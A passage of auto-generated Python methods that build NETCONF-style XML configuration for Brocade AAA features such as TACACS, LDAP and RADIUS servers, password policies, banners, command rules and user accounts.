"""Auto Generated Code
"""
config = ET.Element("config")
tacacs_server = ET.SubElement(config, "tacacs-server", xmlns="urn:brocade.com:mgmt:brocade-aaa")
host = ET.SubElement(tacacs_server, "host")
hostname_key = ET.SubElement(host, "hostname")
hostname_key.text = kwargs.pop('hostname')
use_vrf_key = ET.SubElement(host, "use-vrf")
use_vrf_key.text = kwargs.pop('use_vrf')
encryption_level = ET.SubElement(host, "encryption-level")
encryption_level.text = kwargs.pop('encryption_level')
callback = kwargs.pop('callback', self._callback)
return callback(config)
def tacacs_server_host_retries(self, **kwargs):
"""Auto Generated Code
"""
config = ET.Element("config")
tacacs_server = ET.SubElement(config, "tacacs-server", xmlns="urn:brocade.com:mgmt:brocade-aaa")
host = ET.SubElement(tacacs_server, "host")
hostname_key = ET.SubElement(host, "hostname")
hostname_key.text = kwargs.pop('hostname')
use_vrf_key = ET.SubElement(host, "use-vrf")
use_vrf_key.text = kwargs.pop('use_vrf')
retries = ET.SubElement(host, "retries")
retries.text = kwargs.pop('retries')
callback = kwargs.pop('callback', self._callback)
return callback(config)
def tacacs_server_host_timeout(self, **kwargs):
"""Auto Generated Code
"""
config = ET.Element("config")
tacacs_server = ET.SubElement(config, "tacacs-server", xmlns="urn:brocade.com:mgmt:brocade-aaa")
host = ET.SubElement(tacacs_server, "host")
hostname_key = ET.SubElement(host, "hostname")
hostname_key.text = kwargs.pop('hostname')
use_vrf_key = ET.SubElement(host, "use-vrf")
use_vrf_key.text = kwargs.pop('use_vrf')
timeout = ET.SubElement(host, "timeout")
timeout.text = kwargs.pop('timeout')
callback = kwargs.pop('callback', self._callback)
return callback(config)
def tacacs_server_tacacs_source_ip(self, **kwargs):
"""Auto Generated Code
"""
config = ET.Element("config")
tacacs_server = ET.SubElement(config, "tacacs-server", xmlns="urn:brocade.com:mgmt:brocade-aaa")
tacacs_source_ip = ET.SubElement(tacacs_server, "tacacs-source-ip")
tacacs_source_ip.text = kwargs.pop('tacacs_source_ip')
callback = kwargs.pop('callback', self._callback)
return callback(config)
def ldap_server_host_hostname(self, **kwargs):
"""Auto Generated Code
"""
config = ET.Element("config")
ldap_server = ET.SubElement(config, "ldap-server", xmlns="urn:brocade.com:mgmt:brocade-aaa")
host = ET.SubElement(ldap_server, "host")
use_vrf_key = ET.SubElement(host, "use-vrf")
use_vrf_key.text = kwargs.pop('use_vrf')
hostname = ET.SubElement(host, "hostname")
hostname.text = kwargs.pop('hostname')
callback = kwargs.pop('callback', self._callback)
return callback(config)
def ldap_server_host_use_vrf(self, **kwargs):
"""Auto Generated Code
"""
config = ET.Element("config")
ldap_server = ET.SubElement(config, "ldap-server", xmlns="urn:brocade.com:mgmt:brocade-aaa")
host = ET.SubElement(ldap_server, "host")
hostname_key = ET.SubElement(host, "hostname")
hostname_key.text = kwargs.pop('hostname')
use_vrf = ET.SubElement(host, "use-vrf")
use_vrf.text = kwargs.pop('use_vrf')
callback = kwargs.pop('callback', self._callback)
return callback(config)
def ldap_server_host_port(self, **kwargs):
"""Auto Generated Code
"""
config = ET.Element("config")
ldap_server = ET.SubElement(config, "ldap-server", xmlns="urn:brocade.com:mgmt:brocade-aaa")
host = ET.SubElement(ldap_server, "host")
hostname_key = ET.SubElement(host, "hostname")
hostname_key.text = kwargs.pop('hostname')
use_vrf_key = ET.SubElement(host, "use-vrf")
use_vrf_key.text = kwargs.pop('use_vrf')
port = ET.SubElement(host, "port")
port.text = kwargs.pop('port')
callback = kwargs.pop('callback', self._callback)
return callback(config)
def ldap_server_host_retries(self, **kwargs):
"""Auto Generated Code
"""
config = ET.Element("config")
ldap_server = ET.SubElement(config, "ldap-server", xmlns="urn:brocade.com:mgmt:brocade-aaa")
host = ET.SubElement(ldap_server, "host")
hostname_key = ET.SubElement(host, "hostname")
hostname_key.text = kwargs.pop('hostname')
use_vrf_key = ET.SubElement(host, "use-vrf")
use_vrf_key.text = kwargs.pop('use_vrf')
retries = ET.SubElement(host, "retries")
retries.text = kwargs.pop('retries')
callback = kwargs.pop('callback', self._callback)
return callback(config)
def ldap_server_host_timeout(self, **kwargs):
"""Auto Generated Code
"""
config = ET.Element("config")
ldap_server = ET.SubElement(config, "ldap-server", xmlns="urn:brocade.com:mgmt:brocade-aaa")
host = ET.SubElement(ldap_server, "host")
hostname_key = ET.SubElement(host, "hostname")
hostname_key.text = kwargs.pop('hostname')
use_vrf_key = ET.SubElement(host, "use-vrf")
use_vrf_key.text = kwargs.pop('use_vrf')
timeout = ET.SubElement(host, "timeout")
timeout.text = kwargs.pop('timeout')
callback = kwargs.pop('callback', self._callback)
return callback(config)
def ldap_server_host_basedn(self, **kwargs):
"""Auto Generated Code
"""
config = ET.Element("config")
ldap_server = ET.SubElement(config, "ldap-server", xmlns="urn:brocade.com:mgmt:brocade-aaa")
host = ET.SubElement(ldap_server, "host")
hostname_key = ET.SubElement(host, "hostname")
hostname_key.text = kwargs.pop('hostname')
use_vrf_key = ET.SubElement(host, "use-vrf")
use_vrf_key.text = kwargs.pop('use_vrf')
basedn = ET.SubElement(host, "basedn")
basedn.text = kwargs.pop('basedn')
callback = kwargs.pop('callback', self._callback)
return callback(config)
def ldap_server_maprole_group_ad_group(self, **kwargs):
"""Auto Generated Code
"""
config = ET.Element("config")
ldap_server = ET.SubElement(config, "ldap-server", xmlns="urn:brocade.com:mgmt:brocade-aaa")
maprole = ET.SubElement(ldap_server, "maprole")
group = ET.SubElement(maprole, "group")
ad_group = ET.SubElement(group, "ad-group")
ad_group.text = kwargs.pop('ad_group')
callback = kwargs.pop('callback', self._callback)
return callback(config)
def ldap_server_maprole_group_switch_role(self, **kwargs):
"""Auto Generated Code
"""
config = ET.Element("config")
ldap_server = ET.SubElement(config, "ldap-server", xmlns="urn:brocade.com:mgmt:brocade-aaa")
maprole = ET.SubElement(ldap_server, "maprole")
group = ET.SubElement(maprole, "group")
ad_group_key = ET.SubElement(group, "ad-group")
ad_group_key.text = kwargs.pop('ad_group')
switch_role = ET.SubElement(group, "switch-role")
switch_role.text = kwargs.pop('switch_role')
callback = kwargs.pop('callback', self._callback)
return callback(config)
def password_attributes_min_length(self, **kwargs):
"""Auto Generated Code
"""
config = ET.Element("config")
password_attributes = ET.SubElement(config, "password-attributes", xmlns="urn:brocade.com:mgmt:brocade-aaa")
min_length = ET.SubElement(password_attributes, "min-length")
min_length.text = kwargs.pop('min_length')
callback = kwargs.pop('callback', self._callback)
return callback(config)
def password_attributes_max_retry(self, **kwargs):
"""Auto Generated Code
"""
config = ET.Element("config")
password_attributes = ET.SubElement(config, "password-attributes", xmlns="urn:brocade.com:mgmt:brocade-aaa")
max_retry = ET.SubElement(password_attributes, "max-retry")
max_retry.text = kwargs.pop('max_retry')
callback = kwargs.pop('callback', self._callback)
return callback(config)
def password_attributes_max_lockout_duration(self, **kwargs):
"""Auto Generated Code
"""
config = ET.Element("config")
password_attributes = ET.SubElement(config, "password-attributes", xmlns="urn:brocade.com:mgmt:brocade-aaa")
max_lockout_duration = ET.SubElement(password_attributes, "max-lockout-duration")
max_lockout_duration.text = kwargs.pop('max_lockout_duration')
callback = kwargs.pop('callback', self._callback)
return callback(config)
def password_attributes_character_restriction_upper(self, **kwargs):
"""Auto Generated Code
"""
config = ET.Element("config")
password_attributes = ET.SubElement(config, "password-attributes", xmlns="urn:brocade.com:mgmt:brocade-aaa")
character_restriction = ET.SubElement(password_attributes, "character-restriction")
upper = ET.SubElement(character_restriction, "upper")
upper.text = kwargs.pop('upper')
callback = kwargs.pop('callback', self._callback)
return callback(config)
def password_attributes_character_restriction_lower(self, **kwargs):
"""Auto Generated Code
"""
config = ET.Element("config")
password_attributes = ET.SubElement(config, "password-attributes", xmlns="urn:brocade.com:mgmt:brocade-aaa")
character_restriction = ET.SubElement(password_attributes, "character-restriction")
lower = ET.SubElement(character_restriction, "lower")
lower.text = kwargs.pop('lower')
callback = kwargs.pop('callback', self._callback)
return callback(config)
def password_attributes_character_restriction_numeric(self, **kwargs):
"""Auto Generated Code
"""
config = ET.Element("config")
password_attributes = ET.SubElement(config, "password-attributes", xmlns="urn:brocade.com:mgmt:brocade-aaa")
character_restriction = ET.SubElement(password_attributes, "character-restriction")
numeric = ET.SubElement(character_restriction, "numeric")
numeric.text = kwargs.pop('numeric')
callback = kwargs.pop('callback', self._callback)
return callback(config)
def password_attributes_character_restriction_special_char(self, **kwargs):
"""Auto Generated Code
"""
config = ET.Element("config")
password_attributes = ET.SubElement(config, "password-attributes", xmlns="urn:brocade.com:mgmt:brocade-aaa")
character_restriction = ET.SubElement(password_attributes, "character-restriction")
special_char = ET.SubElement(character_restriction, "special-char")
special_char.text = kwargs.pop('special_char')
callback = kwargs.pop('callback', self._callback)
return callback(config)
def password_attributes_admin_lockout_enable(self, **kwargs):
"""Auto Generated Code
"""
config = ET.Element("config")
password_attributes = ET.SubElement(config, "password-attributes", xmlns="urn:brocade.com:mgmt:brocade-aaa")
admin_lockout_enable = ET.SubElement(password_attributes, "admin-lockout-enable")
callback = kwargs.pop('callback', self._callback)
return callback(config)
def banner_login(self, **kwargs):
"""Auto Generated Code
"""
config = ET.Element("config")
banner = ET.SubElement(config, "banner", xmlns="urn:brocade.com:mgmt:brocade-aaa")
login = ET.SubElement(banner, "login")
login.text = kwargs.pop('login')
callback = kwargs.pop('callback', self._callback)
return callback(config)
def banner_motd(self, **kwargs):
"""Auto Generated Code
"""
config = ET.Element("config")
banner = ET.SubElement(config, "banner", xmlns="urn:brocade.com:mgmt:brocade-aaa")
motd = ET.SubElement(banner, "motd")
motd.text = kwargs.pop('motd')
callback = kwargs.pop('callback', self._callback)
return callback(config)
def banner_incoming(self, **kwargs):
"""Auto Generated Code
"""
config = ET.Element("config")
banner = ET.SubElement(config, "banner", xmlns="urn:brocade.com:mgmt:brocade-aaa")
incoming = ET.SubElement(banner, "incoming")
incoming.text = kwargs.pop('incoming')
callback = kwargs.pop('callback', self._callback)
return callback(config)
def rule_index(self, **kwargs):
"""Auto Generated Code
"""
config = ET.Element("config")
rule = ET.SubElement(config, "rule", xmlns="urn:brocade.com:mgmt:brocade-aaa")
index = ET.SubElement(rule, "index")
index.text = kwargs.pop('index')
callback = kwargs.pop('callback', self._callback)
return callback(config)
def rule_action(self, **kwargs):
"""Auto Generated Code
"""
config = ET.Element("config")
rule = ET.SubElement(config, "rule", xmlns="urn:brocade.com:mgmt:brocade-aaa")
index_key = ET.SubElement(rule, "index")
index_key.text = kwargs.pop('index')
action = ET.SubElement(rule, "action")
action.text = kwargs.pop('action')
callback = kwargs.pop('callback', self._callback)
return callback(config)
def rule_operation(self, **kwargs):
"""Auto Generated Code
"""
config = ET.Element("config")
rule = ET.SubElement(config, "rule", xmlns="urn:brocade.com:mgmt:brocade-aaa")
index_key = ET.SubElement(rule, "index")
index_key.text = kwargs.pop('index')
operation = ET.SubElement(rule, "operation")
operation.text = kwargs.pop('operation')
callback = kwargs.pop('callback', self._callback)
return callback(config)
def rule_role(self, **kwargs):
"""Auto Generated Code
"""
config = ET.Element("config")
rule = ET.SubElement(config, "rule", xmlns="urn:brocade.com:mgmt:brocade-aaa")
index_key = ET.SubElement(rule, "index")
index_key.text = kwargs.pop('index')
role = ET.SubElement(rule, "role")
role.text = kwargs.pop('role')
callback = kwargs.pop('callback', self._callback)
return callback(config)
def rule_command_cmdlist_container_cmds_enumList(self, **kwargs):
"""Auto Generated Code
"""
config = ET.Element("config")
rule = ET.SubElement(config, "rule", xmlns="urn:brocade.com:mgmt:brocade-aaa")
index_key = ET.SubElement(rule, "index")
index_key.text = kwargs.pop('index')
command = ET.SubElement(rule, "command")
cmdlist = ET.SubElement(command, "cmdlist")
container_cmds = ET.SubElement(cmdlist, "container-cmds")
enumList = ET.SubElement(container_cmds, "enumList")
enumList.text = kwargs.pop('enumList')
callback = kwargs.pop('callback', self._callback)
return callback(config)
def rule_command_cmdlist_interface_d_interface_fcoe_leaf_interface_fcoe_leaf(self, **kwargs):
"""Auto Generated Code
"""
config = ET.Element("config")
rule = ET.SubElement(config, "rule", xmlns="urn:brocade.com:mgmt:brocade-aaa")
index_key = ET.SubElement(rule, "index")
index_key.text = kwargs.pop('index')
command = ET.SubElement(rule, "command")
cmdlist = ET.SubElement(command, "cmdlist")
interface_d = ET.SubElement(cmdlist, "interface-d")
interface_fcoe_leaf = ET.SubElement(interface_d, "interface-fcoe-leaf")
interface = ET.SubElement(interface_fcoe_leaf, "interface")
fcoe_leaf = ET.SubElement(interface, "fcoe-leaf")
fcoe_leaf.text = kwargs.pop('fcoe_leaf')
callback = kwargs.pop('callback', self._callback)
return callback(config)
def rule_command_cmdlist_interface_e_interface_te_leaf_interface_tengigabitethernet_leaf(self, **kwargs):
"""Auto Generated Code
"""
config = ET.Element("config")
rule = ET.SubElement(config, "rule", xmlns="urn:brocade.com:mgmt:brocade-aaa")
index_key = ET.SubElement(rule, "index")
index_key.text = kwargs.pop('index')
command = ET.SubElement(rule, "command")
cmdlist = ET.SubElement(command, "cmdlist")
interface_e = ET.SubElement(cmdlist, "interface-e")
interface_te_leaf = ET.SubElement(interface_e, "interface-te-leaf")
interface = ET.SubElement(interface_te_leaf, "interface")
tengigabitethernet_leaf = ET.SubElement(interface, "tengigabitethernet-leaf")
tengigabitethernet_leaf.text = kwargs.pop('tengigabitethernet_leaf')
callback = kwargs.pop('callback', self._callback)
return callback(config)
def rule_command_cmdlist_interface_h_interface_ge_leaf_interface_gigabitethernet_leaf(self, **kwargs):
"""Auto Generated Code
"""
config = ET.Element("config")
rule = ET.SubElement(config, "rule", xmlns="urn:brocade.com:mgmt:brocade-aaa")
index_key = ET.SubElement(rule, "index")
index_key.text = kwargs.pop('index')
command = ET.SubElement(rule, "command")
cmdlist = ET.SubElement(command, "cmdlist")
interface_h = ET.SubElement(cmdlist, "interface-h")
interface_ge_leaf = ET.SubElement(interface_h, "interface-ge-leaf")
interface = ET.SubElement(interface_ge_leaf, "interface")
gigabitethernet_leaf = ET.SubElement(interface, "gigabitethernet-leaf")
gigabitethernet_leaf.text = kwargs.pop('gigabitethernet_leaf')
callback = kwargs.pop('callback', self._callback)
return callback(config)
def rule_command_cmdlist_interface_j_interface_pc_leaf_interface_port_channel_leaf(self, **kwargs):
"""Auto Generated Code
"""
config = ET.Element("config")
rule = ET.SubElement(config, "rule", xmlns="urn:brocade.com:mgmt:brocade-aaa")
index_key = ET.SubElement(rule, "index")
index_key.text = kwargs.pop('index')
command = ET.SubElement(rule, "command")
cmdlist = ET.SubElement(command, "cmdlist")
interface_j = ET.SubElement(cmdlist, "interface-j")
interface_pc_leaf = ET.SubElement(interface_j, "interface-pc-leaf")
interface = ET.SubElement(interface_pc_leaf, "interface")
port_channel_leaf = ET.SubElement(interface, "port-channel-leaf")
port_channel_leaf.text = kwargs.pop('port_channel_leaf')
callback = kwargs.pop('callback', self._callback)
return callback(config)
def rule_command_cmdlist_interface_l_interface_vlan_leaf_interface_vlan_leaf(self, **kwargs):
"""Auto Generated Code
"""
config = ET.Element("config")
rule = ET.SubElement(config, "rule", xmlns="urn:brocade.com:mgmt:brocade-aaa")
index_key = ET.SubElement(rule, "index")
index_key.text = kwargs.pop('index')
command = ET.SubElement(rule, "command")
cmdlist = ET.SubElement(command, "cmdlist")
interface_l = ET.SubElement(cmdlist, "interface-l")
interface_vlan_leaf = ET.SubElement(interface_l, "interface-vlan-leaf")
interface = ET.SubElement(interface_vlan_leaf, "interface")
vlan_leaf = ET.SubElement(interface, "vlan-leaf")
vlan_leaf.text = kwargs.pop('vlan_leaf')
callback = kwargs.pop('callback', self._callback)
return callback(config)
def rule_command_cmdlist_interface_m_interface_management_leaf_interface_management_leaf(self, **kwargs):
"""Auto Generated Code
"""
config = ET.Element("config")
rule = ET.SubElement(config, "rule", xmlns="urn:brocade.com:mgmt:brocade-aaa")
index_key = ET.SubElement(rule, "index")
index_key.text = kwargs.pop('index')
command = ET.SubElement(rule, "command")
cmdlist = ET.SubElement(command, "cmdlist")
interface_m = ET.SubElement(cmdlist, "interface-m")
interface_management_leaf = ET.SubElement(interface_m, "interface-management-leaf")
interface = ET.SubElement(interface_management_leaf, "interface")
management_leaf = ET.SubElement(interface, "management-leaf")
management_leaf.text = kwargs.pop('management_leaf')
callback = kwargs.pop('callback', self._callback)
return callback(config)
def rule_command_cmdlist_interface_o_interface_loopback_leaf_interface_loopback_leaf(self, **kwargs):
"""Auto Generated Code
"""
config = ET.Element("config")
rule = ET.SubElement(config, "rule", xmlns="urn:brocade.com:mgmt:brocade-aaa")
index_key = ET.SubElement(rule, "index")
index_key.text = kwargs.pop('index')
command = ET.SubElement(rule, "command")
cmdlist = ET.SubElement(command, "cmdlist")
interface_o = ET.SubElement(cmdlist, "interface-o")
interface_loopback_leaf = ET.SubElement(interface_o, "interface-loopback-leaf")
interface = ET.SubElement(interface_loopback_leaf, "interface")
loopback_leaf = ET.SubElement(interface, "loopback-leaf")
loopback_leaf.text = kwargs.pop('loopback_leaf')
callback = kwargs.pop('callback', self._callback)
return callback(config)
def rule_command_cmdlist_interface_q_interface_ve_leaf_interface_ve_leaf(self, **kwargs):
"""Auto Generated Code
"""
config = ET.Element("config")
rule = ET.SubElement(config, "rule", xmlns="urn:brocade.com:mgmt:brocade-aaa")
index_key = ET.SubElement(rule, "index")
index_key.text = kwargs.pop('index')
command = ET.SubElement(rule, "command")
cmdlist = ET.SubElement(command, "cmdlist")
interface_q = ET.SubElement(cmdlist, "interface-q")
interface_ve_leaf = ET.SubElement(interface_q, "interface-ve-leaf")
interface = ET.SubElement(interface_ve_leaf, "interface")
ve_leaf = ET.SubElement(interface, "ve-leaf")
ve_leaf.text = kwargs.pop('ve_leaf')
callback = kwargs.pop('callback', self._callback)
return callback(config)
def rule_command_cmdlist_interface_s_interface_fc_leaf_interface_fibrechannel_leaf(self, **kwargs):
"""Auto Generated Code
"""
config = ET.Element("config")
rule = ET.SubElement(config, "rule", xmlns="urn:brocade.com:mgmt:brocade-aaa")
index_key = ET.SubElement(rule, "index")
index_key.text = kwargs.pop('index')
command = ET.SubElement(rule, "command")
cmdlist = ET.SubElement(command, "cmdlist")
interface_s = ET.SubElement(cmdlist, "interface-s")
interface_fc_leaf = ET.SubElement(interface_s, "interface-fc-leaf")
interface = ET.SubElement(interface_fc_leaf, "interface")
fibrechannel_leaf = ET.SubElement(interface, "fibrechannel-leaf")
fibrechannel_leaf.text = kwargs.pop('fibrechannel_leaf')
callback = kwargs.pop('callback', self._callback)
return callback(config)
def rule_command_cmdlist_interface_u_interface_fe_leaf_interface_fortygigabitethernet_leaf(self, **kwargs):
"""Auto Generated Code
"""
config = ET.Element("config")
rule = ET.SubElement(config, "rule", xmlns="urn:brocade.com:mgmt:brocade-aaa")
index_key = ET.SubElement(rule, "index")
index_key.text = kwargs.pop('index')
command = ET.SubElement(rule, "command")
cmdlist = ET.SubElement(command, "cmdlist")
interface_u = ET.SubElement(cmdlist, "interface-u")
interface_fe_leaf = ET.SubElement(interface_u, "interface-fe-leaf")
interface = ET.SubElement(interface_fe_leaf, "interface")
fortygigabitethernet_leaf = ET.SubElement(interface, "fortygigabitethernet-leaf")
fortygigabitethernet_leaf.text = kwargs.pop('fortygigabitethernet_leaf')
callback = kwargs.pop('callback', self._callback)
return callback(config)
def rule_command_cmdlist_interface_w_interface_he_leaf_interface_hundredgigabitethernet_leaf(self, **kwargs):
"""Auto Generated Code
"""
config = ET.Element("config")
rule = ET.SubElement(config, "rule", xmlns="urn:brocade.com:mgmt:brocade-aaa")
index_key = ET.SubElement(rule, "index")
index_key.text = kwargs.pop('index')
command = ET.SubElement(rule, "command")
cmdlist = ET.SubElement(command, "cmdlist")
interface_w = ET.SubElement(cmdlist, "interface-w")
interface_he_leaf = ET.SubElement(interface_w, "interface-he-leaf")
interface = ET.SubElement(interface_he_leaf, "interface")
hundredgigabitethernet_leaf = ET.SubElement(interface, "hundredgigabitethernet-leaf")
hundredgigabitethernet_leaf.text = kwargs.pop('hundredgigabitethernet_leaf')
callback = kwargs.pop('callback', self._callback)
return callback(config)
def root_sa_root_enable(self, **kwargs):
"""Auto Generated Code
"""
config = ET.Element("config")
root_sa = ET.SubElement(config, "root-sa", xmlns="urn:brocade.com:mgmt:brocade-aaa")
root = ET.SubElement(root_sa, "root")
enable = ET.SubElement(root, "enable")
callback = kwargs.pop('callback', self._callback)
return callback(config)
def root_sa_root_access(self, **kwargs):
"""Auto Generated Code
"""
config = ET.Element("config")
root_sa = ET.SubElement(config, "root-sa", xmlns="urn:brocade.com:mgmt:brocade-aaa")
root = ET.SubElement(root_sa, "root")
access = ET.SubElement(root, "access")
access.text = kwargs.pop('access')
callback = kwargs.pop('callback', self._callback)
return callback(config)
def alias_config_alias_name(self, **kwargs):
"""Auto Generated Code
"""
config = ET.Element("config")
alias_config = ET.SubElement(config, "alias-config", xmlns="urn:brocade.com:mgmt:brocade-aaa")
alias = ET.SubElement(alias_config, "alias")
name = ET.SubElement(alias, "name")
name.text = kwargs.pop('name')
callback = kwargs.pop('callback', self._callback)
return callback(config)
def alias_config_alias_expansion(self, **kwargs):
"""Auto Generated Code
"""
config = ET.Element("config")
alias_config = ET.SubElement(config, "alias-config", xmlns="urn:brocade.com:mgmt:brocade-aaa")
alias = ET.SubElement(alias_config, "alias")
name_key = ET.SubElement(alias, "name")
name_key.text = kwargs.pop('name')
expansion = ET.SubElement(alias, "expansion")
expansion.text = kwargs.pop('expansion')
callback = kwargs.pop('callback', self._callback)
return callback(config)
def alias_config_user_name(self, **kwargs):
"""Auto Generated Code
"""
config = ET.Element("config")
alias_config = ET.SubElement(config, "alias-config", xmlns="urn:brocade.com:mgmt:brocade-aaa")
user = ET.SubElement(alias_config, "user")
name = ET.SubElement(user, "name")
name.text = kwargs.pop('name')
callback = kwargs.pop('callback', self._callback)
return callback(config)
def alias_config_user_alias_name(self, **kwargs):
"""Auto Generated Code
"""
config = ET.Element("config")
alias_config = ET.SubElement(config, "alias-config", xmlns="urn:brocade.com:mgmt:brocade-aaa")
user = ET.SubElement(alias_config, "user")
name_key = ET.SubElement(user, "name")
name_key.text = kwargs.pop('name')
alias = ET.SubElement(user, "alias")
name = ET.SubElement(alias, "name")
name.text = kwargs.pop('name')
callback = kwargs.pop('callback', self._callback)
return callback(config)
def alias_config_user_alias_expansion(self, **kwargs):
"""Auto Generated Code
"""
config = ET.Element("config")
alias_config = ET.SubElement(config, "alias-config", xmlns="urn:brocade.com:mgmt:brocade-aaa")
user = ET.SubElement(alias_config, "user")
name_key = ET.SubElement(user, "name")
name_key.text = kwargs.pop('name')
alias = ET.SubElement(user, "alias")
name_key = ET.SubElement(alias, "name")
name_key.text = kwargs.pop('name')
expansion = ET.SubElement(alias, "expansion")
expansion.text = kwargs.pop('expansion')
callback = kwargs.pop('callback', self._callback)
return callback(config)
def aaa_config_aaa_authentication_login_first(self, **kwargs):
"""Auto Generated Code
"""
config = ET.Element("config")
aaa_config = ET.SubElement(config, "aaa-config", xmlns="urn:brocade.com:mgmt:brocade-aaa")
aaa = ET.SubElement(aaa_config, "aaa")
authentication = ET.SubElement(aaa, "authentication")
login = ET.SubElement(authentication, "login")
first = ET.SubElement(login, "first")
first.text = kwargs.pop('first')
callback = kwargs.pop('callback', self._callback)
return callback(config)
def aaa_config_aaa_authentication_login_second(self, **kwargs):
"""Auto Generated Code
"""
config = ET.Element("config")
aaa_config = ET.SubElement(config, "aaa-config", xmlns="urn:brocade.com:mgmt:brocade-aaa")
aaa = ET.SubElement(aaa_config, "aaa")
authentication = ET.SubElement(aaa, "authentication")
login = ET.SubElement(authentication, "login")
second = ET.SubElement(login, "second")
second.text = kwargs.pop('second')
callback = kwargs.pop('callback', self._callback)
return callback(config)
def aaa_config_aaa_accounting_exec_defaultacc_start_stop_server_type(self, **kwargs):
"""Auto Generated Code
"""
config = ET.Element("config")
aaa_config = ET.SubElement(config, "aaa-config", xmlns="urn:brocade.com:mgmt:brocade-aaa")
aaa = ET.SubElement(aaa_config, "aaa")
accounting = ET.SubElement(aaa, "accounting")
exec_el = ET.SubElement(accounting, "exec")
defaultacc = ET.SubElement(exec_el, "defaultacc")
start_stop = ET.SubElement(defaultacc, "start-stop")
server_type = ET.SubElement(start_stop, "server-type")
server_type.text = kwargs.pop('server_type')
callback = kwargs.pop('callback', self._callback)
return callback(config)
def aaa_config_aaa_accounting_commands_defaultacc_start_stop_server_type(self, **kwargs):
"""Auto Generated Code
"""
config = ET.Element("config")
aaa_config = ET.SubElement(config, "aaa-config", xmlns="urn:brocade.com:mgmt:brocade-aaa")
aaa = ET.SubElement(aaa_config, "aaa")
accounting = ET.SubElement(aaa, "accounting")
commands = ET.SubElement(accounting, "commands")
defaultacc = ET.SubElement(commands, "defaultacc")
start_stop = ET.SubElement(defaultacc, "start-stop")
server_type = ET.SubElement(start_stop, "server-type")
server_type.text = kwargs.pop('server_type')
callback = kwargs.pop('callback', self._callback)
return callback(config)
def username_name(self, **kwargs):
"""Auto Generated Code
"""
config = ET.Element("config")
username = ET.SubElement(config, "username", xmlns="urn:brocade.com:mgmt:brocade-aaa")
name = ET.SubElement(username, "name")
name.text = kwargs.pop('name')
callback = kwargs.pop('callback', self._callback)
return callback(config)
def username_user_password(self, **kwargs):
"""Auto Generated Code
"""
config = ET.Element("config")
username = ET.SubElement(config, "username", xmlns="urn:brocade.com:mgmt:brocade-aaa")
name_key = ET.SubElement(username, "name")
name_key.text = kwargs.pop('name')
user_password = ET.SubElement(username, "user-password")
user_password.text = kwargs.pop('user_password')
callback = kwargs.pop('callback', self._callback)
return callback(config)
def username_encryption_level(self, **kwargs):
"""Auto Generated Code
"""
config = ET.Element("config")
username = ET.SubElement(config, "username", xmlns="urn:brocade.com:mgmt:brocade-aaa")
name_key = ET.SubElement(username, "name")
name_key.text = kwargs.pop('name')
encryption_level = ET.SubElement(username, "encryption-level")
encryption_level.text = kwargs.pop('encryption_level')
callback = kwargs.pop('callback', self._callback)
return callback(config)
def username_role(self, **kwargs):
"""Auto Generated Code
"""
config = ET.Element("config")
username = ET.SubElement(config, "username", xmlns="urn:brocade.com:mgmt:brocade-aaa")
name_key = ET.SubElement(username, "name")
name_key.text = kwargs.pop('name')
role = ET.SubElement(username, "role")
role.text = kwargs.pop('role')
callback = kwargs.pop('callback', self._callback)
return callback(config)
def username_desc(self, **kwargs):
"""Auto Generated Code
"""
config = ET.Element("config")
username = ET.SubElement(config, "username", xmlns="urn:brocade.com:mgmt:brocade-aaa")
name_key = ET.SubElement(username, "name")
name_key.text = kwargs.pop('name')
desc = ET.SubElement(username, "desc")
desc.text = kwargs.pop('desc')
callback = kwargs.pop('callback', self._callback)
return callback(config)
def username_enable(self, **kwargs):
"""Auto Generated Code
"""
config = ET.Element("config")
username = ET.SubElement(config, "username", xmlns="urn:brocade.com:mgmt:brocade-aaa")
name_key = ET.SubElement(username, "name")
name_key.text = kwargs.pop('name')
enable = ET.SubElement(username, "enable")
enable.text = kwargs.pop('enable')
callback = kwargs.pop('callback', self._callback)
return callback(config)
def username_expire(self, **kwargs):
"""Auto Generated Code
"""
config = ET.Element("config")
username = ET.SubElement(config, "username", xmlns="urn:brocade.com:mgmt:brocade-aaa")
name_key = ET.SubElement(username, "name")
name_key.text = kwargs.pop('name')
expire = ET.SubElement(username, "expire")
expire.text = kwargs.pop('expire')
callback = kwargs.pop('callback', self._callback)
return callback(config)
def service_password_encryption(self, **kwargs):
"""Auto Generated Code
"""
config = ET.Element("config")
service = ET.SubElement(config, "service", xmlns="urn:brocade.com:mgmt:brocade-aaa")
password_encryption = ET.SubElement(service, "password-encryption")
callback = kwargs.pop('callback', self._callback)
return callback(config)
def role_name_name(self, **kwargs):
"""Auto Generated Code
"""
config = ET.Element("config")
role = ET.SubElement(config, "role", xmlns="urn:brocade.com:mgmt:brocade-aaa")
name = ET.SubElement(role, "name")
name = ET.SubElement(name, "name")
name.text = kwargs.pop('name')
callback = kwargs.pop('callback', self._callback)
return callback(config)
def role_name_desc(self, **kwargs):
"""Auto Generated Code
"""
config = ET.Element("config")
role = ET.SubElement(config, "role", xmlns="urn:brocade.com:mgmt:brocade-aaa")
name = ET.SubElement(role, "name")
name_key = ET.SubElement(name, "name")
name_key.text = kwargs.pop('name')
desc = ET.SubElement(name, "desc")
desc.text = kwargs.pop('desc')
callback = kwargs.pop('callback', self._callback)
return callback(config)
def radius_server_host_hostname(self, **kwargs):
"""Auto Generated Code
"""
config = ET.Element("config")
radius_server = ET.SubElement(config, "radius-server", xmlns="urn:brocade.com:mgmt:brocade-aaa")
host = ET.SubElement(radius_server, "host")
use_vrf_key = ET.SubElement(host, "use-vrf")
use_vrf_key.text = kwargs.pop('use_vrf')
hostname = ET.SubElement(host, "hostname")
hostname.text = kwargs.pop('hostname')
callback = kwargs.pop('callback', self._callback)
return callback(config)
def radius_server_host_use_vrf(self, **kwargs):
"""Auto Generated Code
"""
config = ET.Element("config")
radius_server = ET.SubElement(config, "radius-server", xmlns="urn:brocade.com:mgmt:brocade-aaa")
host = ET.SubElement(radius_server, "host")
hostname_key = ET.SubElement(host, "hostname")
hostname_key.text = kwargs.pop('hostname')
use_vrf = ET.SubElement(host, "use-vrf")
use_vrf.text = kwargs.pop('use_vrf')
callback = kwargs.pop('callback', self._callback)
return callback(config)
def radius_server_host_auth_port(self, **kwargs):
"""Auto Generated Code
"""
config = ET.Element("config")
radius_server = ET.SubElement(config, "radius-server", xmlns="urn:brocade.com:mgmt:brocade-aaa")
host = ET.SubElement(radius_server, "host")
hostname_key = ET.SubElement(host, "hostname")
hostname_key.text = kwargs.pop('hostname')
use_vrf_key = ET.SubElement(host, "use-vrf")
use_vrf_key.text = kwargs.pop('use_vrf')
auth_port = ET.SubElement(host, "auth-port")
auth_port.text = kwargs.pop('auth_port')
